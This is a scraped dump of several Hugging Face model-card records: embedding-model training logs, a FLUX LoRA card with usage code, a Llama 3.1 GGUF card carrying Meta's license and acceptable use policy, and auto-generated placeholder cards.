- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 5
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: True
- `dataloader_num_workers`: 2
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: True
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: True
- `resume_from_checkpoint`: None
- `hub_model_id`: RikoteMaster/embedder-granite
- `hub_strategy`: end
- `hub_private_repo`: True
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: proportional
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:---------:|:--------:|:-------------:|:---------------:|
| 0.1859 | 50 | 0.3983 | - |
| 0.3717 | 100 | 0.193 | - |
| 0.5576 | 150 | 0.0828 | - |
| 0.7435 | 200 | 0.0409 | 0.0339 |
| 0.9294 | 250 | 0.0386 | - |
| 1.1152 | 300 | 0.0322 | - |
| 1.3011 | 350 | 0.0311 | - |
| 1.4870 | 400 | 0.0275 | 0.0167 |
| 1.6729 | 450 | 0.0252 | - |
| 1.8587 | 500 | 0.0254 | - |
| 2.0446 | 550 | 0.0254 | - |
| 2.2305 | 600 | 0.0227 | 0.0129 |
| 2.4164 | 650 | 0.0236 | - |
| 2.6022 | 700 | 0.0185 | - |
| 2.7881 | 750 | 0.0234 | - |
| 2.9740 | 800 | 0.0274 | 0.0118 |
| 3.1599 | 850 | 0.0208 | - |
| 3.3457 | 900 | 0.0245 | - |
| 3.5316 | 950 | 0.0242 | - |
| 3.7175 | 1000 | 0.0219 | 0.0112 |
| 3.9033 | 1050 | 0.0239 | - |
| 4.0892 | 1100 | 0.0223 | - |
| 4.2751 | 1150 | 0.0212 | - |
| **4.461** | **1200** | **0.0223** | **0.0107** |
| 4.6468 | 1250 | 0.0228 | - |
| 4.8327 | 1300 | 0.0196 | - |
* The bold row denotes the saved checkpoint.
### Framework Versions
- Python: 3.10.17
- Sentence Transformers: 4.1.0
- Transformers: 4.52.3
- PyTorch: 2.7.0+cu126
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e | BootesVoid | 2025-06-09T14:15:36Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T14:15:35Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: JASMIN
---
# Cmbneknhk01Zkekg0Qkny5Ki7_Cmbp5Djla002613Bspo66Xg1E
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `JASMIN` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "JASMIN",
"lora_weights": "https://huggingface.co/BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e', weight_name='lora.safetensors')
image = pipeline('JASMIN').images[0]
```
For more details, including weighting, merging, and fusing LoRAs, see the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters).
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e/discussions) to add images that show off what you’ve made with this LoRA.
|
elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF | elichen-skymizer | 2025-06-09T14:06:30Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"facebook",
"meta",
"pytorch",
"llama",
"llama-3",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"en",
"de",
"fr",
"it",
"pt",
"hi",
"es",
"th",
"base_model:meta-llama/Llama-3.1-8B",
"base_model:quantized:meta-llama/Llama-3.1-8B",
"license:llama3.1",... | text-generation | 2025-06-09T14:05:57Z | ---
language:
- en
- de
- fr
- it
- pt
- hi
- es
- th
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
- llama-cpp
- gguf-my-repo
license: llama3.1
extra_gated_prompt: "### LLAMA 3.1 COMMUNITY LICENSE AGREEMENT\nLlama 3.1 Version\
\ Release Date: July 23, 2024\n\"Agreement\" means the terms and conditions for\
\ use, reproduction, distribution and modification of the Llama Materials set forth\
\ herein.\n\"Documentation\" means the specifications, manuals and documentation\
\ accompanying Llama 3.1 distributed by Meta at https://llama.meta.com/doc/overview.\n\
\"Licensee\" or \"you\" means you, or your employer or any other person or entity\
\ (if you are entering into this Agreement on such person or entity’s behalf), of\
\ the age required under applicable laws, rules or regulations to provide legal\
\ consent and that has legal authority to bind your employer or such other person\
\ or entity if you are entering in this Agreement on their behalf.\n\"Llama 3.1\"\
\ means the foundational large language models and software and algorithms, including\
\ machine-learning model code, trained model weights, inference-enabling code, training-enabling\
\ code, fine-tuning enabling code and other elements of the foregoing distributed\
\ by Meta at https://llama.meta.com/llama-downloads.\n\"Llama Materials\" means,\
\ collectively, Meta’s proprietary Llama 3.1 and Documentation (and any portion\
\ thereof) made available under this Agreement.\n\"Meta\" or \"we\" means Meta Platforms\
\ Ireland Limited (if you are located in or, if you are an entity, your principal\
\ place of business is in the EEA or Switzerland) and Meta Platforms, Inc. (if you\
\ are located outside of the EEA or Switzerland).\n \n1. License Rights and Redistribution.\n\
a. Grant of Rights. You are granted a non-exclusive, worldwide, non-transferable\
\ and royalty-free limited license under Meta’s intellectual property or other rights\
\ owned by Meta embodied in the Llama Materials to use, reproduce, distribute, copy,\
\ create derivative works of, and make modifications to the Llama Materials.\nb.\
\ Redistribution and Use.\ni. If you distribute or make available the Llama Materials\
\ (or any derivative works thereof), or a product or service (including another\
\ AI model) that contains any of them, you shall (A) provide a copy of this Agreement\
\ with any such Llama Materials; and (B) prominently display “Built with Llama”\
\ on a related website, user interface, blogpost, about page, or product documentation.\
\ If you use the Llama Materials or any outputs or results of the Llama Materials\
\ to create, train, fine tune, or otherwise improve an AI model, which is distributed\
\ or made available, you shall also include “Llama” at the beginning of any such\
\ AI model name.\nii. If you receive Llama Materials, or any derivative works thereof,\
\ from a Licensee as part of an integrated end user product, then Section 2 of\
\ this Agreement will not apply to you.\niii. You must retain in all copies of the\
\ Llama Materials that you distribute the following attribution notice within a\
\ “Notice” text file distributed as a part of such copies: “Llama 3.1 is licensed\
\ under the Llama 3.1 Community License, Copyright © Meta Platforms, Inc. All Rights\
\ Reserved.”\niv. Your use of the Llama Materials must comply with applicable laws\
\ and regulations (including trade compliance laws and regulations) and adhere to\
\ the Acceptable Use Policy for the Llama Materials (available at https://llama.meta.com/llama3_1/use-policy),\
\ which is hereby incorporated by reference into this Agreement.\n2. Additional\
\ Commercial Terms. If, on the Llama 3.1 version release date, the monthly active\
\ users of the products or services made available by or for Licensee, or Licensee’s\
\ affiliates, is greater than 700 million monthly active users in the preceding\
\ calendar month, you must request a license from Meta, which Meta may grant to\
\ you in its sole discretion, and you are not authorized to exercise any of the\
\ rights under this Agreement unless or until Meta otherwise expressly grants you\
\ such rights.\n3. Disclaimer of Warranty. UNLESS REQUIRED BY APPLICABLE LAW, THE\
\ LLAMA MATERIALS AND ANY OUTPUT AND RESULTS THEREFROM ARE PROVIDED ON AN “AS IS”\
\ BASIS, WITHOUT WARRANTIES OF ANY KIND, AND META DISCLAIMS ALL WARRANTIES OF ANY\
\ KIND, BOTH EXPRESS AND IMPLIED, INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES\
\ OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.\
\ YOU ARE SOLELY RESPONSIBLE FOR DETERMINING THE APPROPRIATENESS OF USING OR REDISTRIBUTING\
\ THE LLAMA MATERIALS AND ASSUME ANY RISKS ASSOCIATED WITH YOUR USE OF THE LLAMA\
\ MATERIALS AND ANY OUTPUT AND RESULTS.\n4. Limitation of Liability. IN NO EVENT\
\ WILL META OR ITS AFFILIATES BE LIABLE UNDER ANY THEORY OF LIABILITY, WHETHER IN\
\ CONTRACT, TORT, NEGLIGENCE, PRODUCTS LIABILITY, OR OTHERWISE, ARISING OUT OF THIS\
\ AGREEMENT, FOR ANY LOST PROFITS OR ANY INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL,\
\ EXEMPLARY OR PUNITIVE DAMAGES, EVEN IF META OR ITS AFFILIATES HAVE BEEN ADVISED\
\ OF THE POSSIBILITY OF ANY OF THE FOREGOING.\n5. Intellectual Property.\na. No\
\ trademark licenses are granted under this Agreement, and in connection with the\
\ Llama Materials, neither Meta nor Licensee may use any name or mark owned by or\
\ associated with the other or any of its affiliates, except as required for reasonable\
\ and customary use in describing and redistributing the Llama Materials or as set\
\ forth in this Section 5(a). Meta hereby grants you a license to use “Llama” (the\
\ “Mark”) solely as required to comply with the last sentence of Section 1.b.i.\
\ You will comply with Meta’s brand guidelines (currently accessible at https://about.meta.com/brand/resources/meta/company-brand/\
\ ). All goodwill arising out of your use of the Mark will inure to the benefit\
\ of Meta.\nb. Subject to Meta’s ownership of Llama Materials and derivatives made\
\ by or for Meta, with respect to any derivative works and modifications of the\
\ Llama Materials that are made by you, as between you and Meta, you are and will\
\ be the owner of such derivative works and modifications.\nc. If you institute\
\ litigation or other proceedings against Meta or any entity (including a cross-claim\
\ or counterclaim in a lawsuit) alleging that the Llama Materials or Llama 3.1 outputs\
\ or results, or any portion of any of the foregoing, constitutes infringement of\
\ intellectual property or other rights owned or licensable by you, then any licenses\
\ granted to you under this Agreement shall terminate as of the date such litigation\
\ or claim is filed or instituted. You will indemnify and hold harmless Meta from\
\ and against any claim by any third party arising out of or related to your use\
\ or distribution of the Llama Materials.\n6. Term and Termination. The term of\
\ this Agreement will commence upon your acceptance of this Agreement or access\
\ to the Llama Materials and will continue in full force and effect until terminated\
\ in accordance with the terms and conditions herein. Meta may terminate this Agreement\
\ if you are in breach of any term or condition of this Agreement. Upon termination\
\ of this Agreement, you shall delete and cease use of the Llama Materials. Sections\
\ 3, 4 and 7 shall survive the termination of this Agreement.\n7. Governing Law\
\ and Jurisdiction. This Agreement will be governed and construed under the laws\
\ of the State of California without regard to choice of law principles, and the\
\ UN Convention on Contracts for the International Sale of Goods does not apply\
\ to this Agreement. The courts of California shall have exclusive jurisdiction\
\ of any dispute arising out of this Agreement.\n### Llama 3.1 Acceptable Use Policy\n\
Meta is committed to promoting safe and fair use of its tools and features, including\
\ Llama 3.1. If you access or use Llama 3.1, you agree to this Acceptable Use Policy\
\ (“Policy”). The most recent copy of this policy can be found at [https://llama.meta.com/llama3_1/use-policy](https://llama.meta.com/llama3_1/use-policy)\n\
#### Prohibited Uses\nWe want everyone to use Llama 3.1 safely and responsibly.\
\ You agree you will not use, or allow others to use, Llama 3.1 to:\n 1. Violate\
\ the law or others’ rights, including to:\n 1. Engage in, promote, generate,\
\ contribute to, encourage, plan, incite, or further illegal or unlawful activity\
\ or content, such as:\n 1. Violence or terrorism\n 2. Exploitation\
\ or harm to children, including the solicitation, creation, acquisition, or dissemination\
\ of child exploitative content or failure to report Child Sexual Abuse Material\n\
\ 3. Human trafficking, exploitation, and sexual violence\n 4. The\
\ illegal distribution of information or materials to minors, including obscene\
\ materials, or failure to employ legally required age-gating in connection with\
\ such information or materials.\n 5. Sexual solicitation\n 6. Any\
\ other criminal activity\n 3. Engage in, promote, incite, or facilitate the\
\ harassment, abuse, threatening, or bullying of individuals or groups of individuals\n\
\ 4. Engage in, promote, incite, or facilitate discrimination or other unlawful\
\ or harmful conduct in the provision of employment, employment benefits, credit,\
\ housing, other economic benefits, or other essential goods and services\n 5.\
\ Engage in the unauthorized or unlicensed practice of any profession including,\
\ but not limited to, financial, legal, medical/health, or related professional\
\ practices\n 6. Collect, process, disclose, generate, or infer health, demographic,\
\ or other sensitive personal or private information about individuals without rights\
\ and consents required by applicable laws\n 7. Engage in or facilitate any action\
\ or generate any content that infringes, misappropriates, or otherwise violates\
\ any third-party rights, including the outputs or results of any products or services\
\ using the Llama Materials\n 8. Create, generate, or facilitate the creation\
\ of malicious code, malware, computer viruses or do anything else that could disable,\
\ overburden, interfere with or impair the proper working, integrity, operation\
\ or appearance of a website or computer system\n2. Engage in, promote, incite,\
\ facilitate, or assist in the planning or development of activities that present\
\ a risk of death or bodily harm to individuals, including use of Llama 3.1 related\
\ to the following:\n 1. Military, warfare, nuclear industries or applications,\
\ espionage, use for materials or activities that are subject to the International\
\ Traffic Arms Regulations (ITAR) maintained by the United States Department of\
\ State\n 2. Guns and illegal weapons (including weapon development)\n 3.\
\ Illegal drugs and regulated/controlled substances\n 4. Operation of critical\
\ infrastructure, transportation technologies, or heavy machinery\n 5. Self-harm\
\ or harm to others, including suicide, cutting, and eating disorders\n 6. Any\
\ content intended to incite or promote violence, abuse, or any infliction of bodily\
\ harm to an individual\n3. Intentionally deceive or mislead others, including use\
\ of Llama 3.1 related to the following:\n 1. Generating, promoting, or furthering\
\ fraud or the creation or promotion of disinformation\n 2. Generating, promoting,\
\ or furthering defamatory content, including the creation of defamatory statements,\
\ images, or other content\n 3. Generating, promoting, or further distributing\
\ spam\n 4. Impersonating another individual without consent, authorization,\
\ or legal right\n 5. Representing that the use of Llama 3.1 or outputs are human-generated\n\
\ 6. Generating or facilitating false online engagement, including fake reviews\
\ and other means of fake online engagement\n4. Fail to appropriately disclose to\
\ end users any known dangers of your AI system\nPlease report any violation of\
\ this Policy, software “bug,” or other problems that could lead to a violation\
\ of this Policy through one of the following means:\n * Reporting issues with\
\ the model: [https://github.com/meta-llama/llama-models/issues](https://github.com/meta-llama/llama-models/issues)\n\
\ * Reporting risky content generated by the model:\n developers.facebook.com/llama_output_feedback\n\
\ * Reporting bugs and security concerns: facebook.com/whitehat/info\n * Reporting\
\ violations of the Acceptable Use Policy or unlicensed uses of Meta Llama 3: LlamaUseReport@meta.com"
extra_gated_fields:
First Name: text
Last Name: text
Date of birth: date_picker
Country: country
Affiliation: text
Job title:
type: select
options:
- Student
- Research Graduate
- AI researcher
- AI developer/engineer
- Reporter
- Other
geo: ip_location
? By clicking Submit below I accept the terms of the license and acknowledge that
the information I provide will be collected stored processed and shared in accordance
with the Meta Privacy Policy
: checkbox
extra_gated_description: The information you provide will be collected, stored, processed
and shared in accordance with the [Meta Privacy Policy](https://www.facebook.com/privacy/policy/).
extra_gated_button_content: Submit
library_name: transformers
base_model: meta-llama/Llama-3.1-8B
---
# elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF
This model was converted to GGUF format from [`meta-llama/Llama-3.1-8B`](https://huggingface.co/meta-llama/Llama-3.1-8B) using llama.cpp, via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/meta-llama/Llama-3.1-8B) for more details on the model.
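As a rough sanity check on download size: in llama.cpp, Q6_K stores about 6.5625 bits per weight, so an ~8B-parameter model lands near 6.6 GB. This is an estimate only — it ignores per-tensor metadata and any tensors kept at a different precision:

```python
# Assumed parameter count for Llama-3.1-8B (~8.03B weights).
params = 8.03e9
bits_per_weight = 6.5625  # llama.cpp Q6_K

size_gb = params * bits_per_weight / 8 / 1e9
print(round(size_gb, 2))  # 6.59
```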
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.
Step 1: Clone llama.cpp from GitHub.
```bash
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag, along with any other hardware-specific flags (for example, `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```bash
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```bash
./llama-cli --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -p "The meaning to life and the universe is"
```
or
```bash
./llama-server --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -c 2048
```
|
MoroM02/0.6B_dpo_run_logs_1ep_fd500 | MoroM02 | 2025-06-09T14:06:11Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:04:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
aledm03/new_MCQA_no_code_v2_b128_lr5e-06_neft5_200 | aledm03 | 2025-06-09T14:04:51Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:03:29Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Treza12/BioMistral-invasive-FULL | Treza12 | 2025-06-09T14:04:06Z | 51 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"8-bit",
"region:us"
] | text-generation | 2025-06-07T10:51:20Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
